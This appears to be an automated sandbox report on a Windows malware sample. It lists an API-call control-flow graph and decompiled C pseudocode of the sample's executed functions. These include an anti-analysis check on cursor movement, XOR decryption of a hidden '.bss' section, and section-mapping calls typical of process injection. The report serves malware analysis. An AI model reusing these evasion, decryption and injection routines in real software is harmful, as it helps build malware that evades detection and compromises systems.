mbstowcs memset 7827->7828 7829 2d1c4f 7828->7829 7830 2d2622 SysAllocString SysFreeString SysFreeString SysFreeString SysFreeString 7829->7830 7831 2d1caa 7829->7831 7832 2d1c68 7830->7832 7831->7760 7831->7762 7833 2d1c6e GetSystemTimeAsFileTime 7832->7833 7834 2d1c99 HeapFree 7832->7834 7835 2d26cc 8 API calls 7833->7835 7834->7831 7836 2d1c97 7835->7836 7836->7834 7838 2d268e 7837->7838 7839 2d1d14 7837->7839 7840 2d2495 SysAllocString SysFreeString SysFreeString SysFreeString SysFreeString 7838->7840 7842 2d1015 HeapFree 7839->7842 7841 2d26b6 SysFreeString 7840->7841 7841->7839 7842->7756 7844 2d4d36 RtlQueryPerformanceFrequency RtlQueryPerformanceCounter _aulldiv 7843->7844 7845 2d4d30 GetTickCount 7843->7845 7847 2d4dae GetSystemTimeAsFileTime _aulldiv 7844->7847 7845->7844 7850 2d4def 7847->7850 7848 2d487f 8 API calls 7849 2d4e3b 7848->7849 7851 2d5024 HeapFree 7849->7851 7852 2d4e65 GetTickCount 7849->7852 7853 2d5014 HeapFree 7849->7853 7850->7848 7851->7766 7854 2d27b3 7852->7854 7853->7851 7855 2d4e70 RtlEnterCriticalSection RtlLeaveCriticalSection 7854->7855 7856 2d4b5a 12 API calls 7855->7856 7857 2d4eaa 7856->7857 7858 2d5004 HeapFree 7857->7858 7859 2d4ec6 StrTrimA 7857->7859 7858->7853 7860 2d4340 lstrcpy lstrcat 7859->7860 7861 2d4ed8 7860->7861 7862 2d4ff6 HeapFree 7861->7862 7863 2d4ee3 lstrcpy 7861->7863 7862->7858 7864 2d4f00 7863->7864 7865 2d43cf lstrlen mbstowcs memset 7864->7865 7866 2d4f12 7865->7866 7867 2d4fb7 7866->7867 7868 2d5457 HeapFree CoCreateInstance 7866->7868 7870 2d4fe3 HeapFree 7867->7870 7871 2d4fce 7867->7871 7869 2d4f26 7868->7869 7872 2d4f6f 7869->7872 7874 2d52d0 11 API calls 7869->7874 7870->7862 7873 2d482d RtlEnterCriticalSection Sleep RtlLeaveCriticalSection 7871->7873 7876 2d4fa8 7872->7876 7877 2d4f8c wcstombs 7872->7877 7875 2d4fe1 7873->7875 7880 2d4f40 7874->7880 7875->7870 7878 2d1015 HeapFree 7876->7878 7879 2d584a memcpy 7877->7879 7878->7867 7879->7876 7881 2d1015 HeapFree 7880->7881 7881->7872 7883 
2d4c12 7882->7883 7884 2d4c18 memcpy 7883->7884 7885 2d1bfc 7883->7885 7886 2d4c31 7884->7886 7885->7768 7885->7771 7887 2d5501 25 API calls 7886->7887 7888 2d4c4d memset 7887->7888 7889 2d1015 HeapFree 7888->7889 7890 2d4c61 7889->7890 7890->7885 7891 2d4c65 memcpy 7890->7891 7892 2d1015 HeapFree 7891->7892 7892->7885 7894 2d3a1e GetProcAddress 7893->7894 7896 2d4129 7894->7896 7895 2d3e73 13 API calls 7895->7896 7896->7895 7897 2d4153 7896->7897 7898 2d43cf lstrlen mbstowcs memset 7896->7898 7900 2d4155 HeapFree 7896->7900 7899 2d3a1e GetProcAddress 7897->7899 7898->7896 7901 2d199c 7899->7901 7900->7897 7901->7777 7902 2d3ceb 7901->7902 7903 2d3d01 7902->7903 7904 2d19ae 7903->7904 7905 2d3c8c wsprintfA 7903->7905 7904->7777 7913 2d3a46 7904->7913 7906 2d3d19 7905->7906 7907 2d3d1e lstrlen 7906->7907 7908 2d3d2c 7906->7908 7907->7908 7909 2d3d53 7908->7909 7910 2d3d4b lstrcat 7908->7910 7911 2d3d41 lstrcpy 7908->7911 7912 2d1015 HeapFree 7909->7912 7910->7909 7911->7910 7912->7904 7914 2d19cc 7913->7914 7917 2d3a67 7913->7917 7914->7782 7914->7783 7914->7784 7915 2d3af5 CloseHandle 7915->7914 7916 2d3af4 7916->7915 7917->7914 7917->7915 7917->7916 7918 2d1015 HeapFree 7917->7918 7918->7916 7920 2d18a8 7919->7920 7921 2d18f4 memset memcpy 7920->7921 7923 2d1952 7920->7923 7922 2d191d 7921->7922 7921->7923 7922->7923 7924 2d1935 memcpy 7922->7924 7923->7791 7924->7922 7926 2d15aa 7925->7926 7927 2d1548 7925->7927 7926->7785 7926->7802 7927->7926 7928 2d4421 lstrcmp lstrlen 7927->7928 7929 2d1554 7928->7929 7929->7926 7930 2d13ad lstrlen memcpy memcpy memcpy HeapFree 7929->7930 7931 2d1595 HeapFree 7930->7931 7931->7926 7934 2d3d8e 7932->7934 7933 2d1a52 7940 2d1015 HeapFree 7933->7940 7934->7933 7935 2d16d8 21 API calls 7934->7935 7937 2d3e35 WaitForSingleObject 7934->7937 7938 2d1015 HeapFree 7934->7938 7939 2d3e0e 7934->7939 7935->7934 7936 2d1015 HeapFree 7936->7933 7937->7934 7937->7939 7938->7934 7939->7936 7940->7785 7942 2d21ce CoCreateInstance 
SysFreeString SysFreeString SysFreeString 7941->7942 7943 2d1356 7942->7943 7944 2d135c memset 7943->7944 7945 2d13a8 7943->7945 7946 2d3a1e GetProcAddress 7944->7946 7951 2d1015 HeapFree 7945->7951 7947 2d138b 7946->7947 7948 2d1399 GetLastError 7947->7948 7949 2d13a1 7947->7949 7948->7949 7950 2d3a1e GetProcAddress 7949->7950 7950->7945 7951->7790 7952->7800 7954 402128 7953->7954 7962 402189 memcpy 7953->7962 7963 4025ad 7954->7963 7956 402138 7957 4025ad 16 API calls 7956->7957 7958 402153 7957->7958 7959 4025ad 16 API calls 7958->7959 7960 40216e 7959->7960 7961 4025ad 16 API calls 7960->7961 7961->7962 7962->7573 7964 4025b9 7963->7964 7975 40247a 7964->7975 7967 4025de VirtualAlloc 7970 4025f6 7967->7970 7974 40263a 7967->7974 7968 402678 7968->7956 7969 402669 VirtualFree 7969->7968 7972 40262a 7970->7972 7988 401eaa 7970->7988 7973 4029cc 2 API calls 7972->7973 7973->7974 7974->7968 7974->7969 7991 401efe GetProcAddress 7975->7991 7978 402560 7981 402591 VirtualFree 7978->7981 7982 40259f 7978->7982 7979 4024bf 7980 401efe 5 API calls 7979->7980 7983 4024dd VirtualFree VirtualAlloc 7979->7983 7984 4024fd 7979->7984 7980->7979 7981->7982 7982->7967 7982->7974 7983->7979 7983->7984 7984->7978 7985 40251e lstrcmpiA 7984->7985 7985->7978 7986 402532 StrChrA 7985->7986 7986->7984 7987 40253f lstrcmpiA 7986->7987 7987->7978 7987->7984 7989 401ec1 GetProcAddress 7988->7989 7990 401edb 7988->7990 7989->7990 7990->7970 7992 401f2a 7991->7992 7993 4020f7 VirtualAlloc 7991->7993 7992->7993 8008 401046 HeapAlloc 7992->8008 7993->7978 7993->7979 7995 401f4c 7995->7993 8009 401046 HeapAlloc 7995->8009 7997 401f61 7999 401eaa GetProcAddress 7997->7999 8004 4020d6 7997->8004 8000 401f79 7999->8000 8002 401eaa GetProcAddress 8000->8002 8000->8004 8001 4020ed 8001->7993 8011 40105b HeapFree 8001->8011 8005 401f95 8002->8005 8010 40105b HeapFree 8004->8010 8005->8004 8006 401eaa GetProcAddress 8005->8006 8007 402095 StrRChrA 8005->8007 8006->8005 8007->8005 8008->7995 
8009->7997 8010->8001 8011->7993 8602 40e000 8604 40e00d 8602->8604 8603 40fe9a 5 API calls 8605 40e08b 8603->8605 8604->8603 8604->8604 8012 2d8aec 8014 2d8ab8 8012->8014 8015 2d8cbc 8014->8015 8016 2d8d23 RaiseException 8015->8016 8017 2d8d42 8015->8017 8019 2d8ed0 8016->8019 8018 2d8daf LoadLibraryA 8017->8018 8017->8019 8020 2d8dff InterlockedExchange 8017->8020 8022 2d8e3a 8017->8022 8018->8020 8021 2d8dbe GetLastError 8018->8021 8019->8014 8026 2d8e0d 8020->8026 8027 2d8e33 FreeLibrary 8020->8027 8024 2d8dde RaiseException 8021->8024 8025 2d8dd0 8021->8025 8022->8019 8023 2d8e85 GetProcAddress 8022->8023 8023->8019 8028 2d8e95 GetLastError 8023->8028 8024->8019 8025->8020 8025->8024 8026->8022 8029 2d8e13 LocalAlloc 8026->8029 8027->8022 8030 2d8ea7 8028->8030 8029->8022 8031 2d8e21 8029->8031 8030->8019 8032 2d8eb5 RaiseException 8030->8032 8031->8022 8032->8019 8033 40fd83 8034 40fdb3 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8033->8034 8035 40fda6 8033->8035 8036 40fdaa 8034->8036 8035->8034 8035->8036 8610 411407 8611 40f850 3 API calls 8610->8611 8612 411411 8611->8612 8613 411907 8616 41189d 8613->8616 8617 4118ae 8616->8617 8618 4118c8 8617->8618 8619 413e1b 15 API calls 8617->8619 8619->8618 8620 40f10a 8621 40f116 8620->8621 8623 40f11b 8620->8623 8622 41051a 40 API calls 8621->8622 8622->8623 8121 2d8b60 8122 2d8b4f 8121->8122 8122->8121 8123 2d8cbc ___delayLoadHelper2@8 10 API calls 8122->8123 8123->8122 8963 2d8ae2 8964 2d8ab8 8963->8964 8964->8963 8965 2d8cbc ___delayLoadHelper2@8 10 API calls 8964->8965 8965->8964 8966 2506f5 8968 25070b 8966->8968 8967 25078a GetPEB 8969 2507bb 8967->8969 8968->8967 8973 250964 8968->8973 8972 250875 8969->8972 8974 250afd 8969->8974 8971 25094f GetPEB 8971->8973 8972->8971 8972->8972 8972->8973 8975 250bff 8974->8975 8977 250b15 8974->8977 8975->8969 8976 250c6c GetPEB 8976->8977 8977->8975 8977->8976 8978 40f493 8979 40f4ce 8978->8979 8980 40f4af 
8978->8980 8981 40f569 8979->8981 8987 40f4b7 8979->8987 8985 40f4c3 GetLastError 8980->8985 8980->8987 8982 40f571 GetEnvironmentStrings 8981->8982 8983 40f4f1 8981->8983 8982->8983 8984 40f581 8982->8984 8986 411099 Sleep 8984->8986 8985->8979 8989 40f59a 8986->8989 8987->8983 8988 40f55e FreeEnvironmentStringsW 8987->8988 8990 411099 Sleep 8987->8990 8988->8983 8991 40f5a1 FreeEnvironmentStringsA 8989->8991 8992 40f5ad 8989->8992 8995 40f532 8990->8995 8991->8983 8993 40f5b5 FreeEnvironmentStringsA 8992->8993 8993->8983 8994 40f555 8994->8988 8995->8988 8995->8994 8996 410d1a 3 API calls 8995->8996 8996->8994 9003 40ef9b 9004 40fa43 15 API calls 9003->9004 9005 40efa6 9004->9005 9006 40efac UnhandledExceptionFilter 9005->9006 9007 40efba 9005->9007 9009 40f00a 9006->9009 9008 40effc UnhandledExceptionFilter 9007->9008 9007->9009 9008->9009 9010 40009e 9012 400073 9010->9012 9011 40009c 9012->9011 9013 401019 GetModuleHandleA GetCommandLineW 9012->9013 9014 40103e ExitProcess 9012->9014 9015 4010ed 296 API calls 9013->9015 9016 401030 HeapDestroy 9015->9016 9016->9014 8628 40f91f TlsAlloc 8629 2de74f 8630 2de78c 8629->8630 8631 2de767 GetModuleHandleA GetProcAddress 8629->8631 8631->8630 8632 410c22 8633 410c34 8632->8633 8634 410cb6 8633->8634 8635 410ccb 8633->8635 8638 410c3d 8633->8638 8639 4136dc 8634->8639 8643 410be2 8635->8643 8641 4136f0 8639->8641 8642 413700 ___ascii_strnicmp 8639->8642 8640 411915 20 API calls 8640->8641 8641->8640 8641->8642 8642->8638 8644 410bf3 8643->8644 8647 410859 8644->8647 8648 410883 CompareStringW 8647->8648 8651 41089a 8647->8651 8649 4108a6 GetLastError 8648->8649 8648->8651 8649->8651 8650 40fe9a 5 API calls 8652 410be0 8650->8652 8653 410b1b 8651->8653 8657 41092a 8651->8657 8664 410907 8651->8664 8652->8638 8654 4134b0 15 API calls 8653->8654 8655 410b41 8654->8655 8656 410ba2 CompareStringA 8655->8656 8658 4134f7 10 API calls 8655->8658 8655->8664 8660 410bc0 8656->8660 8656->8664 8659 41096c GetCPInfo 8657->8659 
8657->8664 8673 41097d 8657->8673 8661 410b66 8658->8661 8659->8664 8659->8673 8662 410d1a 3 API calls 8660->8662 8661->8664 8665 4134f7 10 API calls 8661->8665 8663 410bc6 8662->8663 8666 410d1a 3 API calls 8663->8666 8664->8650 8667 410b87 8665->8667 8666->8664 8668 410b90 8667->8668 8669 410b9c 8667->8669 8670 410d1a 3 API calls 8668->8670 8669->8656 8670->8664 8671 410b09 8672 41083e 3 API calls 8671->8672 8672->8664 8673->8664 8673->8671 8674 410b03 8673->8674 8675 410aec CompareStringW 8673->8675 8676 41083e 3 API calls 8674->8676 8675->8674 8676->8671 9020 4117a8 9021 4117ba 9020->9021 9023 4117c8 @_EH4_CallFilterFunc@8 9020->9023 9022 40fe9a 5 API calls 9021->9022 9022->9023 8680 2de542 CreateEventA 8681 2de5af GetLastError 8680->8681 8682 2de560 GetVersion 8680->8682 8683 2de56a 8682->8683 8684 2de572 GetCurrentProcessId OpenProcess 8683->8684 8685 2de5aa 8683->8685 8686 2de59f 8684->8686 8687 40e134 8688 40e138 8687->8688 8689 40f850 3 API calls 8688->8689 8690 40e150 8688->8690 8689->8688 8691 40ef35 8692 40ef3c 8691->8692 8695 40ef6b 8692->8695 8697 40ed95 8692->8697 8696 40ed95 10 API calls 8696->8695 8698 40eda1 8697->8698 8699 40eefc GetStdHandle 8698->8699 8703 40ede4 8698->8703 8705 40eef7 8698->8705 8700 40ef0a 8699->8700 8699->8705 8701 40ef24 WriteFile 8700->8701 8700->8705 8701->8705 8702 40ee1a GetModuleFileNameA 8706 40ee38 8702->8706 8703->8702 8703->8705 8705->8696 8707 412282 8706->8707 8732 40f8b3 8707->8732 8710 412351 8716 40f8bc 3 API calls 8710->8716 8722 412390 8710->8722 8711 4122aa LoadLibraryA 8712 4122c2 8711->8712 8713 4122bb 8711->8713 8712->8713 8718 40f850 3 API calls 8712->8718 8713->8705 8714 40f8bc 3 API calls 8721 4123df 8714->8721 8715 40f8bc 3 API calls 8715->8713 8717 412371 8716->8717 8720 40f8bc 3 API calls 8717->8720 8725 41239d 8717->8725 8719 4122da 8718->8719 8723 40f850 3 API calls 8719->8723 8720->8722 8724 40f8bc 3 API calls 8721->8724 8721->8725 8722->8714 8722->8725 8726 4122ef 8723->8726 8724->8725 
8725->8715 8727 40f850 3 API calls 8726->8727 8728 412304 8727->8728 8728->8710 8729 40f850 3 API calls 8728->8729 8730 412339 8729->8730 8730->8710 8731 40f850 3 API calls 8730->8731 8731->8710 8733 40f850 3 API calls 8732->8733 8734 40f8ba 8733->8734 8734->8710 8734->8711 8208 40e1b8 GetModuleHandleA 8209 40e1c7 GetProcAddress 8208->8209 8210 40e1d7 8208->8210 8209->8210 8411 40ed3b HeapCreate 8412 40ed5b 8411->8412 8413 40ed5e 8411->8413 8414 40ed91 8413->8414 8418 40e1e1 RtlAllocateHeap 8413->8418 8417 40ed7c HeapDestroy 8417->8412 8419 40e1fd 8418->8419 8419->8414 8419->8417 9024 2de2d6 NtCreateSection 9025 2de33b 9024->9025 9026 2de371 RtlNtStatusToDosError 9024->9026 9031 2de297 NtMapViewOfSection RtlNtStatusToDosError 9025->9031 9030 2de349 9026->9030 9028 2de38c 9029 2de383 NtClose 9029->9028 9030->9028 9030->9029 9031->9030

      Executed Functions

      Control-flow Graph

      C-Code - Quality: 98%
      			E004010ED() {
      				short _v60;
      				short _v68;
      				unsigned int _v76;
      				void _v92;
      				long _v96;
      				intOrPtr _v100;
      				struct tagPOINT _v108;
      				signed int _v112;
      				struct tagPOINT _v120;
      				signed int _v124;
      				void* __esi;
      				long _t44;
      				void* _t45;
      				signed int _t46;
      				signed int _t52;
      				unsigned int _t57;
      				long _t58;
      				intOrPtr _t59;
      				long _t61;
      				signed int _t64;
      				void* _t71;
      				void* _t72;
      				signed int _t77;
      				signed int _t86;
      				signed int _t89;
      				signed int _t91;
      				long _t93;
      				signed int _t94;
      				signed char* _t95;
      				signed char* _t98;
      				signed int* _t104;
      				void* _t105;
      				void* _t106;
      				signed int _t108;
      				signed int _t112;
      				WCHAR* _t131;
      
      				_v112 = _v112 & 0x00000000;
      				_t108 = E00401B9B();
      				if(_t108 != 0) {
      					L26:
      					return _t108;
      				} else {
      					GetCursorPos( &_v108);
      					_t108 = 0xc;
      					while(1) {
      						_t44 = WaitForSingleObject( *0x405474, 0x40); // executed
      						if(_t44 == 0) {
      							break;
      						}
      						GetCursorPos( &_v120);
      						_t90 = _v108.y ^ _v108.x;
      						_t86 = E00401C7A((_v120.y ^ _v120.x) - (_v108.y ^ _v108.x) & 0x0000001f); // executed
      						_t108 = _t86;
      						if(_t108 == 0xc) {
      							continue;
      						}
      						break;
      					}
      					if(_t108 != 0) {
      						goto L26;
      					}
      					_t45 = E00401DA8(_t90); // executed
      					_t122 = _t45;
      					if(_t45 != 0) {
      						 *0x405480 = 1; // executed
      					}
      					_t46 = E00401070(_t90, _t122); // executed
      					_t108 = _t46;
      					if(_t108 != 0) {
      						L24:
      						if(_t108 == 0xffffffff) {
      							_t108 = GetLastError();
      						}
      						goto L26;
      					}
      					_t108 = E004027FD();
      					if(_t108 != 0) {
      						goto L24;
      					}
      					E00401C0F(_t90); // executed
      					_t91 = 6;
      					memset( &_v92, 0, _t91 << 2);
      					_t52 =  *0x405498; // 0x736c6e70
      					if(E0040286F(0,  &_v92,  &_v76, _t52 ^ 0xed79247c) == 0) {
      						_t108 = 0xb;
      						goto L24;
      					}
      					_t57 = _v76;
      					_v124 = _v124 & _t108;
      					_t104 = _v92;
      					_t89 =  *0x405494; // 0x0
      					_t93 = _t57;
      					_t58 = _t57 >> 2;
      					_v108.x = _t93;
      					_t98 = _t104;
      					_v120.x = _t58;
      					if(_t58 == 0) {
      						L13:
      						_t94 = _t93 & 0x00000003;
      						if(_t94 == 0) {
      							L16:
      							_t131 =  *0x40548c; // 0x22e89e0
      							if(_t131 != 0) {
      								wsprintfW( &_v68, 0x4040e0, GetCurrentProcessId());
      								_t71 = CreateFileMappingW(0xffffffff, 0, 4, 0, lstrlenW( *0x40548c) + _t69 + 2,  &_v60); // executed
      								if(_t71 != 0) {
      									_t72 = MapViewOfFile(_t71, 6, 0, 0, 0); // executed
      									_t105 = _t72;
      									if(_t105 != 0) {
      										lstrcpyW(_t105,  *0x40548c);
      										UnmapViewOfFile(_t105);
      									}
      								}
      							}
      							if(( *0x405480 & 0x00000001) != 0) {
      								_v112 = 0x10;
      							}
      							_t59 =  *0x405478; // 0x950
      							_v100 = _t59;
      							_v96 = GetCurrentThreadId();
      							_t61 =  *0x405474; // 0x8c
      							_v108.x = _t61;
      							_v108.y = GetCurrentThread();
      							_t64 = E0040143E( &_v92,  &_v108, _v112); // executed
      							_t108 = _t64;
      							goto L24;
      						}
      						_t112 = _t94;
      						_t95 = _t98;
      						_t106 = _t104 - _t98;
      						do {
      							 *_t95 =  *(_t106 + _t95) ^ _t89;
      							_t95 =  &(_t95[1]);
      							_t112 = _t112 - 1;
      						} while (_t112 != 0);
      						goto L16;
      					} else {
      						goto L11;
      					}
      					do {
      						L11:
      						_v124 = _v124 + 1;
      						_t77 =  *_t104;
      						asm("rol eax, cl");
      						_t104 =  &(_t104[1]);
      						_t108 = _t77 ^ _t108 ^ _t89;
      						 *_t98 = _t108;
      						_t98 =  &(_t98[4]);
      						_t22 =  &_v120;
      						 *_t22 = _v120.x - 1;
      					} while ( *_t22 != 0);
      					_t93 = _v108.x;
      					goto L13;
      				}
      			}








































      APIs
        • Part of subcall function 00401B9B: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401103,?,00000000), ref: 00401BAA
        • Part of subcall function 00401B9B: GetVersion.KERNEL32(?,00000000), ref: 00401BB9
        • Part of subcall function 00401B9B: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401BD0
        • Part of subcall function 00401B9B: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401BE9
      • GetCursorPos.USER32(?), ref: 00401118
      • WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
      • GetCursorPos.USER32(?), ref: 00401134
        • Part of subcall function 00401C7A: lstrcpynA.KERNEL32(?,.bss,00000008,767F1218,0000000C), ref: 00401CA8
        • Part of subcall function 00401C7A: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401D1B
        • Part of subcall function 00401C7A: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401D64
        • Part of subcall function 00401C7A: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401D7D
        • Part of subcall function 00401DA8: GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,00401165,?,00000000), ref: 00401DC5
        • Part of subcall function 00401DA8: GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00401165,?,00000000), ref: 00401DD6
        • Part of subcall function 00401DA8: IsWow64Process.KERNELBASE(0000008C,00000000,0000000C,?,?,00401165,?,00000000), ref: 00401DEE
        • Part of subcall function 00401070: StrStrIA.SHLWAPI(00000000,?), ref: 004010C7
        • Part of subcall function 00401070: HeapFree.KERNEL32(00000000,?,?), ref: 004010E1
      • GetLastError.KERNEL32(?,00000000), ref: 004012E5
        • Part of subcall function 004027FD: GetModuleHandleA.KERNEL32(NTDLL.DLL,767F1218,00000000,?,?,00401187,?,00000000), ref: 0040280E
        • Part of subcall function 004027FD: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,00401187,?,00000000), ref: 0040281E
        • Part of subcall function 00401C0F: GetLongPathNameW.KERNEL32 ref: 00401C3B
        • Part of subcall function 00401C0F: GetLongPathNameW.KERNEL32 ref: 00401C59
        • Part of subcall function 0040286F: memcpy.NTDLL(00000000,?,?,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 0040294D
      • GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
      • wsprintfW.USER32 ref: 0040123B
      • lstrlenW.KERNEL32(?), ref: 0040124F
      • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
      • lstrcpyW.KERNEL32(00000000), ref: 00401283
      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
      • GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
      • GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD
        • Part of subcall function 0040143E: memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040156C
        • Part of subcall function 0040143E: memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004015BB
        • Part of subcall function 0040143E: memcpy.NTDLL(?,00401699,00000800,?,?,?,00000000), ref: 0040162B
        • Part of subcall function 0040143E: NtUnmapViewOfSection.NTDLL ref: 00401656
        • Part of subcall function 0040143E: RtlNtStatusToDosError.NTDLL ref: 0040165D
        • Part of subcall function 0040143E: CloseHandle.KERNEL32 ref: 0040166C
        • Part of subcall function 0040143E: memset.NTDLL ref: 00401680
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: memcpy$CurrentHandleProcess$FileModuleView$CreateCursorErrorFreeLongNamePathThreadUnmapVirtual$AddressAllocCloseEventHeapLastMappingObjectOpenProcSectionSingleStatusVersionWaitWow64lstrcpylstrcpynlstrlenmemsetwsprintf
      • String ID: pnls
      • API String ID: 430617508-141991303
      • Opcode ID: cb9a3086c6c9c2d782002ab388e474d75f09457ec9b77396b7070ae190fd9d25
      • Instruction ID: 63aa70c8748f49fe6436392524b71879d85cc5050a50cbbfc132656fe63e4243
      • Opcode Fuzzy Hash: cb9a3086c6c9c2d782002ab388e474d75f09457ec9b77396b7070ae190fd9d25
      • Instruction Fuzzy Hash: AB51C3729042109BC7219F65DD48A5BBBE8EB88355F04067EFA84F72A0C734D8048B9D
      C-Code - Quality: 75%
      			E0040C832(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t29;
      				signed int _t39;
      				signed int _t40;
      				signed int _t42;
      				CHAR* _t43;
      				signed int _t45;
      				signed int _t46;
      				signed int _t47;
      				void* _t48;
      				intOrPtr _t49;
      				intOrPtr _t51;
      				signed int _t67;
      				void* _t68;
      				void* _t69;
      				signed int _t70;
      				long _t73;
      				signed int _t77;
      				struct _OSVERSIONINFOA* _t79;
      				long _t80;
      				void* _t81;
      
      				_push(0x60);
      				_push(0x418c10);
      				E0040D48C(__ebx, __edi, __esi);
      				 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
      				GetStartupInfoA(_t81 - 0x70);
      				 *(_t81 - 4) = 0xfffffffe;
      				_t79 = HeapAlloc(GetProcessHeap(), 0, 0x94);
      				if(_t79 != 0) {
      					_t79->dwOSVersionInfoSize = 0x94;
      					_t29 = GetVersionExA(_t79); // executed
      					_push(_t79);
      					_push(0);
      					__eflags = _t29;
      					if(_t29 != 0) {
      						 *(_t81 - 0x20) = _t79->dwPlatformId;
      						 *(_t81 - 0x24) = _t79->dwMajorVersion;
      						 *(_t81 - 0x28) = _t79->dwMinorVersion;
      						_t77 = _t79->dwBuildNumber & 0x00007fff;
      						HeapFree(GetProcessHeap(), ??, ??);
      						_t80 =  *(_t81 - 0x20);
      						__eflags = _t80 - 2;
      						if(_t80 != 2) {
      							_t77 = _t77 | 0x00008000;
      							__eflags = _t77;
      						}
      						_t67 =  *(_t81 - 0x24);
      						_t73 =  *(_t81 - 0x28);
      						 *0x43607c = _t80;
      						 *0x436084 = (_t67 << 8) + _t73;
      						 *0x436088 = _t67;
      						 *0x43608c = _t73;
      						 *0x436080 = _t77;
      						 *(_t81 - 0x20) = E0040C7F1((_t67 << 8) + _t73);
      						_t39 = E0040ED3B(1, _t73, _t77, 1);
      						_pop(_t68);
      						__eflags = _t39;
      						if(_t39 == 0) {
      							E0040C7CD(_t39, _t80);
      							_t68 = 0x1c;
      						}
      						_t40 = E0040FBFF(1);
      						__eflags = _t40;
      						if(_t40 == 0) {
      							E0040C7CD(_t40, _t80);
      							_t68 = 0x10;
      						}
      						E0040F808();
      						 *(_t81 - 4) = 1;
      						_t42 = E0040F5C8(1, _t73, _t77, _t80, __eflags);
      						__eflags = _t42;
      						if(_t42 < 0) {
      							E0040CDF0(_t73, 0x1b);
      							_pop(_t68); // executed
      						}
      						_t43 = GetCommandLineA(); // executed
      						 *0x436c14 = _t43;
      						 *0x436068 = E0040F493(); // executed
      						_t45 = E0040F3DA(_t68); // executed
      						__eflags = _t45;
      						if(_t45 < 0) {
      							E0040CDF0(_t73, 8);
      							_pop(_t68);
      						}
      						_t46 = E0040F167(_t68, _t73);
      						__eflags = _t46;
      						if(_t46 < 0) {
      							E0040CDF0(_t73, 9);
      						}
      						_t47 = E0040CF0C(1, _t77, _t80, _t81, 1);
      						_pop(_t69);
      						__eflags = _t47;
      						if(_t47 != 0) {
      							E0040CDF0(_t73, _t47);
      							_pop(_t69);
      						}
      						_t48 = E0040F10A(_t69);
      						__eflags =  *(_t81 - 0x44) & 1;
      						if(__eflags == 0) {
      							_t70 = 0xa;
      						} else {
      							_t70 =  *(_t81 - 0x40) & 0x0000ffff;
      						}
      						_t49 = E00408C00(__eflags, 0x400000, 0, _t48, _t70); // executed
      						 *((intOrPtr*)(_t81 - 0x1c)) = _t49;
      						__eflags =  *(_t81 - 0x20);
      						if( *(_t81 - 0x20) == 0) {
      							E0040D06C(_t49);
      						}
      						E0040D08E();
      						 *(_t81 - 4) = 0xfffffffe;
      						_t51 =  *((intOrPtr*)(_t81 - 0x1c));
      					} else {
      						HeapFree(GetProcessHeap(), ??, ??);
      						goto L25;
      					}
      				} else {
      					_push(0x12);
      					E0040C7CD(_t28, _t79);
      					L25:
      					_t51 = 0xff;
      				}
      				return E0040D4D1(_t51);
      			}

      APIs
      • GetStartupInfoA.KERNEL32 ref: 0040C846
      • GetProcessHeap.KERNEL32(00000000,00000094), ref: 0040C861
      • HeapAlloc.KERNEL32(00000000), ref: 0040C864
      • GetVersionExA.KERNEL32(00000000), ref: 0040C880
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C88D
      • HeapFree.KERNEL32(00000000), ref: 0040C890
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C8B6
      • HeapFree.KERNEL32(00000000), ref: 0040C8B9
        • Part of subcall function 0040ED3B: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040C908,00000001), ref: 0040ED4C
        • Part of subcall function 0040ED3B: HeapDestroy.KERNEL32 ref: 0040ED82
        • Part of subcall function 0040FBFF: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040C91A), ref: 0040FC05
        • Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsAlloc,?), ref: 0040FC27
        • Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040FC34
        • Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040FC41
        • Part of subcall function 0040FBFF: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040FC4E
        • Part of subcall function 0040FBFF: TlsAlloc.KERNEL32 ref: 0040FC9E
        • Part of subcall function 0040FBFF: TlsSetValue.KERNEL32(00000000), ref: 0040FCB9
        • Part of subcall function 0040FBFF: GetCurrentThreadId.KERNEL32 ref: 0040FD68
        • Part of subcall function 0040F5C8: GetStartupInfoA.KERNEL32 ref: 0040F5DD
        • Part of subcall function 0040F5C8: GetFileType.KERNEL32(00000028), ref: 0040F6F3
        • Part of subcall function 0040F5C8: GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
        • Part of subcall function 0040F5C8: GetFileType.KERNEL32(00000000), ref: 0040F78F
